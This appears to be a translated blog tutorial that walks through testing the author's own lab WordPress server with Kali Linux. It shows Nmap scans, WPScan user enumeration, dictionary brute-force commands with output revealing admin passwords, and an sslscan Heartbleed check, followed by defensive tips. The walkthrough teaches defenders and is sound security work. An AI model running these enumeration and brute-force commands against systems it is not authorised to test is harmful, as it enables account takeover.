Find and not neutralize: writing penetration tests with Kali Linux

Kali and other similar tools help detect vulnerabilities in your software. And it’s better if you are the first to find them, and not the intruders.

You can’t hide an awl in a sack: out of ignorance (though in some cases – intentionally) even large corporations leave holes in their security system. It is vital to (1) localize and (2) fix them as quickly as possible. Fortunately, there are many different products that help with the first point. Among them are Kali, a Linux distribution designed for security testing. In this article, I will show you how to use Kali Linux to investigate your system and find weaknesses by simulating an attacker.

The Kali distribution includes many tools, all of which are open source. It is enough to run the installation of the distribution and all these tools will be available out of the box.


Picture: Peter Gervase,CC BY-SA 4.0

I will use two systems as test subjects:

  1. kali.usersys.redhat.com: 30 GB memory and 6 virtual CPUs. This system will scan the victim and launch attacks.
  2. vulnerable.usersys.redhat.com: a system with Red Hat Enterprise Linux 8 on board. Here it will need to be attacked.

I mentioned the technical characteristics of the equipment here for a reason. Some of our tasks are quite demanding on the hardware, especially the system 2 CPU, which will run the WordPress security scanner (WPScan).

Search for open ports

I started with a basic system scan 2. Scanning the system with Nmap, you can find out which ports and services are visible from system 1 starting the scan.


Picture: Peter Gervase,CC BY-SA 4.0

So, the first thing to do is to find some “interesting” open ports – potential weaknesses. In fact, any open port is interesting because it is more likely to compromise the network. In this example, 21, 22, 80, and 443 are also ports for frequently used services. But for now, I’m just doing intelligence and trying to get as much information as possible about the system I want to hack.

After that, for a deeper analysis, I’ll select port 80 and run the Nmap command with the -p 80 and -A arguments. This allows you to get information about the operating system and the application that uses port 80.


Picture: Peter Gervase,CC BY-SA 4.0

Here we are interested in the following lines:

PORT   STATE SERVICE VERSION

80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))

|_http-generator: WordPress 5.6.1

Finding information about users

Since I now know this is a WordPress server, I can use WPScan to get information on potential vulnerabilities. It would be nice to find several usernames and their passwords. To find them in a given WordPress instance, use the –enumerate u options:

┌──(rootkali)-[~]

└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u

_______________________________________________________________

        __              _______   _____

             / /  __ / ____|

           /  / /| |__) | (___   ___  __ _ _ __

         /  / / |  ___/ ___ / __|/ _` | '_

                  /  /  | |   ____) | (__| (_| | | | |

                /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.10

        Sponsored by Automattic — https://automattic.com/

        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]

[+] Started: Tue Feb 16 21:38:49 2021

Interesting Finding(s):

...

[i] User(s) Identified:

[+] admin

 | Found By: Author Posts — Display Name (Passive Detection)

 | Confirmed By:

 |  Author Id Brute Forcing — Author Pattern (Aggressive Detection)

 |  Login Error Messages (Aggressive Detection)

[+] pgervase

 | Found By: Author Posts — Display Name (Passive Detection)

 | Confirmed By:

 |  Author Id Brute Forcing — Author Pattern (Aggressive Detection)

 |  Login Error Messages (Aggressive Detection)

Great, found two users: admin and pgervase… I will try to guess the password for the admin user using password dictionaries – a text file with a set of possible options. I will take dictionaries of 3,231 and 3,543,076,137 lines.

Password guessing with dictionary attack

Various tools can be used for dictionary attacks. Here are two example commands with Nmap and WPScan:

# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com

# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt

These two tools, of course, can do much more, but they are also suitable for guessing passwords.

But this WPScan command, for example, displays the password at the end of the file:

┌──(rootkali)-[~]

└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin

_______________________________________________________________

        __              _______   _____

              / /  __  / ____|

           /  / /| |__) | (___   ___  __ _ _ __ 

         /  / / |  ___/ ___  / __|/ _` | '_ 

                  /  /  | |   ____) | (__| (_| | | | |

                /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.10

        Sponsored by Automattic — https://automattic.com/

        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]

[+] Started: Thu Feb 18 20:32:13 2021

Interesting Finding(s):

…..

[+] Performing password attack on Wp Login against 1 user/s

Trying admin / redhat Time: 00:01:57 

<==================================================================================================================>

 (3231 / 3231) 100.00% Time: 00:01:57

Trying admin / redhat Time: 00:01:57 

<=========================================================            

                                             > (3231 / 6462) 50.00% 

 ETA: ??:??:??

[SUCCESS] — admin / redhat                                              

                                                                        

                                                

[!] Valid Combinations Found:

 | Username: admin, Password: redhat

Section Valid Combinations Found at the end contains the username admin and his password. It took only two minutes to iterate over 3,231 lines.

I have another dictionary file with 3,238,659,984 unique entries, which will take much longer.

Nmap produces results much faster:

┌──(rootkali)-[~]

└─# nmap -sV --script http-wordpress-brute 

--script-args userdb=users.txt,passdb=password.txt,threads=6 

vulnerable.usersys.redhat.com

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST

Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)

Host is up (0.00015s latency).

Not shown: 995 closed ports

PORT    STATE SERVICE VERSION

21/tcp   open  ftp      vsftpd 3.0.3

22/tcp   open  ssh      OpenSSH 8.0 (protocol 2.0)

80/tcp   open  http     Apache httpd 2.4.37 ((Red Hat Enterprise Linux))

|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)

| http-wordpress-brute:

|   Accounts:

|       admin:redhat — Valid credentials              <<<<<<<

|       pgervase:redhat — Valid credentials         <<<<<<<

|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0

111/tcp  open  rpcbind 2-4 (RPC #100000)

| rpcinfo:

|   program version     port/proto  service

|   100000  2,3,4       111/tcp   rpcbind

|   100000  2,3,4       111/udp   rpcbind

|   100000  3,4         111/tcp6  rpcbind

|_  100000  3,4         111/udp6  rpcbind

3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB

MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

True, such a scan can be tracked by the HTTPD logs that will be detected in the compromised system:

10.19.47.170

 - — [18/Feb/2021:20:14:01 -0500] «POST /wp-login.php HTTP/1.1» 200 7575

 «http://vulnerable.usersys.redhat.com/» «WPScan v3.8.10 

(https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

Search for Heartbleed Vulnerability

To get information about the HTTPS server and SSL / TLS protocols, I use the sslscan command:

┌──(rootkali)-[~]

└─# sslscan vulnerable.usersys.redhat.com

Version: 2.0.6-static

OpenSSL 1.1.1i-dev  xx XXX xxxx

Connected to 10.19.47.242

Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com

  SSL/TLS Protocols:

SSLv2   disabled

SSLv3   disabled

TLSv1.0   disabled

TLSv1.1   disabled

TLSv1.2   enabled

TLSv1.3   enabled

<snip>

We see that in the versions of the protocols that are used on the server, Heartbleed vulnerability not found:

Heartbleed:

TLSv1.3 not vulnerable to heartbleed

TLSv1.2 not vulnerable to heartbleed

Well, it means that through the Heartbeat module I cannot access the RAM and server data. Well … it’s not destiny 🙂

Hacking Prevention and Protection Tips

You can write many articles on how to resist attacks by hackers of all stripes. Here I will limit myself to general recommendations:

  • Study your system: which ports are open, which ports should be open, who should be able to see these ports and how much traffic should go through them. Nmap will help you.
  • Use the best and best practices: what is considered good practice today will no longer be good practice in the future. It is important to keep abreast of the latest advances in information security.
  • Customize your products and their environment wisely: for example, instead of letting an attacker constantly attack your WordPress system, block their IP address and limit the number of login attempts. However, blocking an IP address is often useless because attackers can use different addresses. However, this setting is easy to enable and will help repel at least some attacks.
  • Create and maintain quality backups: If an attacker breaks into one or more of your systems, the ability to recover data without dancing with a tambourine will save you a lot of time and money.
  • Check your logs: as the examples above show, scan commands and other penetrating manipulations can leave a lot of logs. If you spot them in time, you will have time to protect yourself from hacking.
  • Update your system, applications and any additional modules: specialists US Institute of Standards and Technology are confident that “updates are usually the most effective way to fix vulnerabilities and can often be the only truly effective solution.”
  • Use additional tools from your software vendors: for example, a Red Hat Enterprise Linux subscription includes a tool Red hat insightsthat allows you to customize your system and warns you about potential security threats in a timely manner.

Useful materials (in English)

What is described in this article is just the tip of the iceberg. To dive deeper, you can explore the following resources:


Cloud servers from Macleod fast and safe.

Register using the link above or by clicking on the banner and get a 10% discount for the first month of renting a server of any configuration!

Similar Posts

Leave a Reply